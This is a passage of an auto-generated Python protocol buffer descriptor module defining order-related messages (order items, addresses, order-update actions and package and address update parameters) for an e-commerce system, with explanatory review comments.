serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
# b'8\001': MessageOptions with map_entry=true.
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
# NOTE(review): same 535-580 span as the other LabelsEntry descriptors
# in this file — confirm this matches the generator's output.
serialized_start=535,
serialized_end=580,
)
# Auto-generated descriptor for message order.OrderItem: one line item
# of an order. Strings for ids/titles/types, int64 (type=3) for amounts
# and quantity, double (type=1) for the rebate-rate fields, and message
# fields for sku_prop / labels (maps via the nested entry types below)
# and the repeated gradient_rebate_rates.
# NOTE: `item_id` is declared first (index=0) but carries field number 12,
# so declaration order differs from wire-number order; field number 13 is
# absent — presumably reserved/removed in the source .proto.
_ORDERITEM = _descriptor.Descriptor(
name='OrderItem',
full_name='order.OrderItem',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='order.OrderItem.item_id', index=0,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spu_id', full_name='order.OrderItem.spu_id', index=1,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sku_id', full_name='order.OrderItem.sku_id', index=2,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='order.OrderItem.title', index=3,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='image', full_name='order.OrderItem.image', index=4,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sku_prop', full_name='order.OrderItem.sku_prop', index=5,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='original_amount', full_name='order.OrderItem.original_amount', index=6,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sale_amount', full_name='order.OrderItem.sale_amount', index=7,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discount_amount', full_name='order.OrderItem.discount_amount', index=8,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.OrderItem.total_amount', index=9,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.OrderItem.currency', index=10,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='order.OrderItem.quantity', index=11,
number=11, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cost_amount', full_name='order.OrderItem.cost_amount', index=12,
number=14, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.OrderItem.store_id', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='product_type', full_name='order.OrderItem.product_type', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_type', full_name='order.OrderItem.business_type', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='supplier_id', full_name='order.OrderItem.supplier_id', index=16,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_rebate_rate', full_name='order.OrderItem.user_rebate_rate', index=17,
number=19, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
# b'\030\001' is the serialized FieldOptions with deprecated=true.
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='channel_rebate_rate', full_name='order.OrderItem.channel_rebate_rate', index=18,
number=20, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bind_item_ids', full_name='order.OrderItem.bind_item_ids', index=19,
number=21, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.OrderItem.labels', index=20,
number=22, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='category_id', full_name='order.OrderItem.category_id', index=21,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_rebate_amount_limit', full_name='order.OrderItem.user_rebate_amount_limit', index=22,
number=24, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_apportion_rebate_rate', full_name='order.OrderItem.merchant_apportion_rebate_rate', index=23,
number=25, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
# deprecated=true (same b'\030\001' FieldOptions as user_rebate_rate).
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform_apportion_rebate_rate', full_name='order.OrderItem.platform_apportion_rebate_rate', index=24,
number=26, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
# deprecated=true (same b'\030\001' FieldOptions as user_rebate_rate).
serialized_options=b'\030\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gradient_rebate_rates', full_name='order.OrderItem.gradient_rebate_rates', index=25,
number=27, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
# Map-entry descriptors for the sku_prop and labels map fields.
nested_types=[_ORDERITEM_SKUPROPENTRY, _ORDERITEM_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2640,
serialized_end=3442,
)
# Descriptor for the order.OrderAddress message: the delivery/contact address
# recorded on an order.  Every field here is a singular proto3 string
# (type=9, label=1) with an empty-string default.
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERADDRESS = _descriptor.Descriptor(
  name='OrderAddress',
  full_name='order.OrderAddress',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='order.OrderAddress.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='mobile', full_name='order.OrderAddress.mobile', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='country', full_name='order.OrderAddress.country', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='state', full_name='order.OrderAddress.state', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='city', full_name='order.OrderAddress.city', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='district', full_name='order.OrderAddress.district', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='detail', full_name='order.OrderAddress.detail', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='postcode', full_name='order.OrderAddress.postcode', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='email', full_name='order.OrderAddress.email', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='ward', full_name='order.OrderAddress.ward', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='recharge_phone', full_name='order.OrderAddress.recharge_phone', index=10,
      number=11, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside the serialized
  # FileDescriptorProto; must stay in sync with the .proto file.
  serialized_start=3445,
  serialized_end=3640,
)
# Descriptor for the order.OrderUpdateContent message: an update event on an
# order (who performed which action).  All fields are singular proto3 strings
# except `action_params` (number=6), which is a singular sub-message
# (type=11) whose concrete type is linked to OrderUpdateActionParams below.
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERUPDATECONTENT = _descriptor.Descriptor(
  name='OrderUpdateContent',
  full_name='order.OrderUpdateContent',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='business_code', full_name='order.OrderUpdateContent.business_code', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='order_id', full_name='order.OrderUpdateContent.order_id', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='user_id', full_name='order.OrderUpdateContent.user_id', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='username', full_name='order.OrderUpdateContent.username', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='action', full_name='order.OrderUpdateContent.action', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='action_params', full_name='order.OrderUpdateContent.action_params', index=5,
      number=6, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='user_type', full_name='order.OrderUpdateContent.user_type', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3643,
  serialized_end=3829,
)
# Descriptor for the synthetic string->string entry message backing the
# `labels` map field of order.OrderUpdateActionParams.  The serialized
# option b'8\001' is the standard protoc encoding marking a map entry --
# TODO(review): confirm against the generated .proto if this is ever edited.
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERUPDATEACTIONPARAMS_LABELSENTRY = _descriptor.Descriptor(
  name='LabelsEntry',
  full_name='order.OrderUpdateActionParams.LabelsEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='order.OrderUpdateActionParams.LabelsEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='value', full_name='order.OrderUpdateActionParams.LabelsEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=b'8\001',
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=535,
  serialized_end=580,
)
# Descriptor for the order.OrderUpdateActionParams message: the parameter
# payload of an order-update action.  Mostly singular strings; `int_param1`
# and `total_amount` are int64 (type=3); `packages` and `labels` are
# repeated sub-messages (label=3) and `address` a singular sub-message,
# all linked to their concrete descriptors later in this module.
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERUPDATEACTIONPARAMS = _descriptor.Descriptor(
  name='OrderUpdateActionParams',
  full_name='order.OrderUpdateActionParams',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='review_method', full_name='order.OrderUpdateActionParams.review_method', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='review_remark', full_name='order.OrderUpdateActionParams.review_remark', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='cancel_reason', full_name='order.OrderUpdateActionParams.cancel_reason', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='platform_remark', full_name='order.OrderUpdateActionParams.platform_remark', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='seller_remark', full_name='order.OrderUpdateActionParams.seller_remark', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='str_param1', full_name='order.OrderUpdateActionParams.str_param1', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='int_param1', full_name='order.OrderUpdateActionParams.int_param1', index=6,
      number=7, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='return_remark', full_name='order.OrderUpdateActionParams.return_remark', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='packages', full_name='order.OrderUpdateActionParams.packages', index=8,
      number=9, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='labels', full_name='order.OrderUpdateActionParams.labels', index=9,
      number=10, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='address', full_name='order.OrderUpdateActionParams.address', index=10,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='total_amount', full_name='order.OrderUpdateActionParams.total_amount', index=11,
      number=12, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[_ORDERUPDATEACTIONPARAMS_LABELSENTRY, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3832,
  serialized_end=4265,
)
# Descriptor for the order.OrderPackageUpdateParam message: one shipping
# package in an order-update action.  `item_ids` is a repeated string
# (label=3); the other two fields are singular strings.
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERPACKAGEUPDATEPARAM = _descriptor.Descriptor(
  name='OrderPackageUpdateParam',
  full_name='order.OrderPackageUpdateParam',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='item_ids', full_name='order.OrderPackageUpdateParam.item_ids', index=0,
      number=1, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='logistics_company_id', full_name='order.OrderPackageUpdateParam.logistics_company_id', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='tracking_no', full_name='order.OrderPackageUpdateParam.tracking_no', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=4267,
  serialized_end=4361,
)
# Descriptor for the order.OrderAddressUpdateParam message: the replacement
# address carried by an address-update action.  Same field set as
# OrderAddress (all singular proto3 strings), but with `ward` and `detail`
# at different field numbers (7 and 8 here vs. 10 and 7 there).
# Generated by the protocol buffer compiler -- do not hand-edit.
_ORDERADDRESSUPDATEPARAM = _descriptor.Descriptor(
  name='OrderAddressUpdateParam',
  full_name='order.OrderAddressUpdateParam',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='name', full_name='order.OrderAddressUpdateParam.name', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='mobile', full_name='order.OrderAddressUpdateParam.mobile', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='country', full_name='order.OrderAddressUpdateParam.country', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='state', full_name='order.OrderAddressUpdateParam.state', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='city', full_name='order.OrderAddressUpdateParam.city', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='district', full_name='order.OrderAddressUpdateParam.district', index=5,
      number=6, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='ward', full_name='order.OrderAddressUpdateParam.ward', index=6,
      number=7, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='detail', full_name='order.OrderAddressUpdateParam.detail', index=7,
      number=8, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='postcode', full_name='order.OrderAddressUpdateParam.postcode', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='email', full_name='order.OrderAddressUpdateParam.email', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='recharge_phone', full_name='order.OrderAddressUpdateParam.recharge_phone', index=10,
